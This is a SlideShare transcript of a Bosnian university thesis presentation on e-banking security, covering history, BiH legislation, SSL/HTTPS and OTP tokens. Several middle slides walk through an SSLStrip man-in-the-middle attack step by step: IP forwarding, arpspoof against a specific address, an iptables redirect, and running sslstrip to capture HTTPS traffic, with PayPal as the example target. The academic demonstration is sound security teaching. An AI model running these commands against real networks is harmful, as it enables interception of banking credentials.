• Like
  • Save
E-banking i sigurnost tehnickih rjesenja za Internet transakcije -presentation
Upcoming SlideShare
Loading in...5
×
 

E-banking i sigurnost tehnickih rjesenja za Internet transakcije -presentation

on

  • 176 views

 

Statistics

Views

Total Views
176
Views on SlideShare
175
Embed Views
1

Actions

Likes
0
Downloads
0
Comments
0

1 Embed 1

http://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    E-banking i sigurnost tehnickih rjesenja za Internet transakcije -presentation E-banking i sigurnost tehnickih rjesenja za Internet transakcije -presentation Presentation Transcript

    • E-banking i sigurnost tehničkih rješenja za Internet transakcije Univerzitet u Sarajevu Elektrotehnički fakultet Mentor: dr. Narcis Behlilović Kandidat: Aldina Bajraktarević
    •  KRATKI HISTORIJAT IDEJE e-BANKINGa  PROBLEMI KORISNIKA USLUGA e-BANKING  AKTUENI TRENDOVI  PREGLED STANJA e-BANKARSTVA U BIH  PRAVNA LEGISLATIVA RELEVANTNA ZA OBLAST BANKARSTVA I ELEKTRONSKOG BANKARSTVA  MEHANIZMI POSTIZANJA SIGURNOSTI ZA PRODAVCA I KUPCA U TRANSAKCIJI  SSL PROTOKOL ANALIZA POTENCIJALNIH RJEŠENJA: OTP I USB TOKENI  MEHANIZMI ZA NARUŠAVANJE SIGURNOSTI PRIMJERI USPJEŠNIH NAPADA RIZICI KORIŠTENJA BANKOVNIH KARTICA ZA PLAĆANJE PAYPAL MONEYBOOKERS PIKPAY MJERE PREVENCIJE ZA ZAŠTITU SIGURNOSTI UČESNIKA U TRANSAKCIJI
    •  E-banking ili elektronsko bankarstvo je opći pojam za procese kojima korisnik može obavljati bankarske transakcije elektronskim putem bez posjećivanja institucije nadležne za transakciju (banke, bankomati, ...). KUPAC PRODAVAC BANKA BANKA Naručuje robu i usluge Šalje fakturu Obavještava prodavca da je uplata izvršena Daje nalog banci da prebaci novac prodavcu Informiše kupca da je njegov račun zadužen Prebacuje sredstva na račun prodavca Informiše o izvršenoj uplati Financijska i vremenska dobit kvalitet
    • • Pronalazak novca (između 4. i 8. stoljeća p.n.e) • Prvi elektronski transfer novca izvršen je još davne 1860. godine. -Western Union iz SAD-a uz pomoć telegrafa Prve ideje za rješavanje problema porasta obima papirnih tokova platnog prometa kroz proces kompjuterizacije i eliminisanje papira, ponudila su dva američka profesora, Jakobs Henri (Jacobs Henry) i Robert H. Gregory (Robert H. Gregory).
    • Osnovni nedostaci e-Bankinga su: • odsustvu sigurnosti pri obavljanju poslovanja; • nepostojanju zakonske regulative; • nedostatak privatnosti, otuđenosti i odbojnosti prema inovacijama i opasnosti od zloupotrebe internet bankarstva. Usluge koje klijenti mogu dobiti on-line su: • pribavljanje informacija o tekućem računu, stanje na računu, dozvoljeni limit; • printanje izvještaja o prometu na računu; • transfer sa računa na račun; • plaćanje računa; • kupovina i prodaja akcija; • naručivanje isplata; • praćenje transfera novca; • pregled aktuelnih kamata; • kontakt sa bankom,...
    • Korištenje interneta u BiH u stalnom je porastu. Prema procjenama nadležnih agencija, više od 2.000.000 ljudi u ovoj zemlji koristi globalnu kompjutersku mrežu, što je oko 52 posto od ukupnog broja stanovnika. 70.474 96.041 Prema podacima CB BiH, upotreba e-bankinga za građane BiH: 2011 2012 23.865 29.599 Pravna lica 2011 2012
    • 2006. godine BiH postaje članica Konvencije o cyber kriminalu Vijeća Evrope. Ovo je do sada najveći, najopsežniji ali i najkvalitetniji evropski dokument o takvoj vrsti kriminala koji su potpisale i neke neevropske zemlje. Zakon o elektronskom potpisu 2006. Ne postoji PKI infrastruktura za pravna i fizička lica na nivou države Implementacija??? MUP RS-a formirao posebnu jedinicu za borbu protiv cyber kriminala, što je prvo odjeljenje te vrste u cijeloj BiH
    • U nadležnim institucijama trebalo bi razviti organizacije i educirati ljude kako bismo bili spremni da se borimo protiv ovog oblika kriminala. Do tada će postojeći zakoni za ovu oblast ostati samo na papiru.
    • • Smart Cards; • Tokeni; • Tanovi. SIGURNOST
    • SSL je autentifikacijski protokol, neovisan od aplikacije, i pruža sljedeće usluge: • Klijent-poslužitelj provjeru autentičnosti; • Tajnost podataka; • Provjera podataka izvora; • Integritet podataka.
    • Jednokratne lozinke su oblik „jake autentifikacije“, koja pruža veću razinu zaštite i koriste se za bankovne transakcije preko Interneta, mrežnim sistemima u firmama i drugim sistemima koji sadrže osjetljive i povjerljive informacije. Naprednije vrste tokena zahtijevaju neki oblik veze sa računarom (npr. USB ili Bluetooth) kako bi stupili u kontakt sa poslužiteljem.
    • HTTPS: Hyper Text Transfer Protocol Secure - HTTPS je kombinacija Hyper Text Transfer Protocol i Secure Socket Layer (SSL protokol) / Transport Layer Security (TLS) koji služi za osiguranje šifrirane komunikaciju između web poslužitelja i klijenta. Obično se koristi HTTPS za internet bankarstvo, platne transakcije stranicu za prijavu, itd. ovaj protokol na portu 443 za komunikacije. Web stranice koje koriste ovaj HTTPS-u su i GMail.com, ali i druge web stranice kao što su PayPal, Amazon, itd.
    • Ukoliko želimo da vidimo vezu računara i web poslužitelja u CommandPrompt ukucamo: netstat –an :
    • 1.Linux OS 2. Arpspoof 3. IPTables 4. SSLStrip 5. NetStat
    • 1. echo '1' > /proc/sys/net/ipv4/ip_forward // Ovom naredbom omogućavamo port forwarding, dopušta se BackTrack-u da može proslijediti svaki paket, pa i onaj koji nije namjenjen klijentovom računaru. 2. Saznati adresu mrežnog gatewaya netstat –nr
    • 3. Koristiti naredbu arpspoof, kako biste izvršili tkz. Man in the middle attack. arpspoof -i eth0 77.78.248.141 4. SSLStrip kreiran od strane Moxie Morlinspike koji omogućava demonstraciju HTTPS raskrivanje napada koji su izneseni na Black Hat DC 2009. To će transparentno oteti HTTP promet na mreži, gledati https veze i preusmjeravanja, a zatim mapirati veze u dvojne HTTP veze ili homografski slične HTTPS veze. 4.1 Download-ovati SSLStrip
    • 4.2 tar zxvf sslstrip-0.9.tar.gz
    • 4.3 cd sslstrip-0.9 4.4 python setup.py install 5. Izvršenje SSL Strip napada 5.1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 // Potrebno je podesiti firewall pravilo preko naredbe iptables, na način da se omogući preusmjerenje upita sa porta 80 na 8080. 5.1.1 python sslstrip.py –w secret
    • echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 77.78.248.141 77.78.248.1
    • Unutar foldera SSLStrip kreiran je novi fajl koji pohranjuje sve informacije koje su već snimljene preko HTTP protokola, pa čak i HTTPS. Iz priloženog je izvršeno oslobađanje HTTPS-a od „s“-dodatka, pa tako sada se može izvršiti pristup stranici PayPal-a na sljedeći način: Phishing Pharming Blackhole kit Carding- ako ne pokrijete karticu prilikom placanja,čitanje 16-cifrenog broja sa kartice sasvim dovoljan Lažiranje poruka e-pošte i web stranica->cilj saznati povjerljive i korisne informacije Preusmjeravanje korisnika na lažni web site JavaScript kod
    • PAYPAL MONEYBOOKERS PIKPAY Posrednik u kupovini između kupca i prodavca E-servis koji omogućava platne usluge i transfer novca putem Interneta Internet servis koji pruža On-line plaćanje, on-line naplata, podizanje novca u lokalnim bankama city deal ekupon Najveći nivo sigurnosti, fizička sigurnost servera, ANTI-FRAUD timovi, verifikacija Verisign...
    • MOSTAR BEOGRAD BANJA LUKA SARAJEVO corporateretail CA
    • Kako bi administrator određenoj pametnoj kartici dodao certifikat, potrebno je da ručno pristupi CA, i da naravno preko mašine kojoj pristupa CA, bude priključen čitač kartica. Nakon što administartor ubaci karticu, koristi tkz. ActivCard Gold. To je programski paket, koji upotrebom kartice i čitača kartice ili USB ActivKey-a osigurava najviši nivo sigurnosti autentifikacije korisnika. Analizirajući sistem koristi dužinu ključa od 1024 i hash algoritam SHA-1. Kada administrator doda digitalni certifikat, onda se automatski podaci prenose preko serijskog broja u aplikaciju. VeriSign je poznata kompanija kojoj banka plaća usluge korištenja cetifikata. Da bi banka koristila usluge VeriSigna na tri godine, to košta cca 2.500,00 EURa.
    • serviseri servisi posrednici uređaji za plaćanje korisnikov računar korisnikova svijest
    • Rezultati on-line ankete urađene na bazi 55 ispitanika • U skorije vrijeme će sve veći broj firmi i građana uvidjeti da je mnogo jednostavnije obavljati internet transakcije iz svog doma, po mnogo nižoj cijeni i na jednostavan način. S druge strane, kombinacija backtrack, sslstrip i MiTM je samo jedno od potencijalno jakih sredstava za narušavanje sigurnosti bankovnih računa na vrlo „jednostavan“ način.
    • Ono što se ostavlja kao otvoreno pitanje bankama i ostalim pružaocima usluga internet bankarstva, jeste pitanje spoja usluge, cijene, sigurnosti i same reklame u jednu jedinstvenu cijelinu, koja bi izazvala povjerenje kod korisnika usluga, a ujedno donijela određene profite. KUPAC PRODAVAC BANKA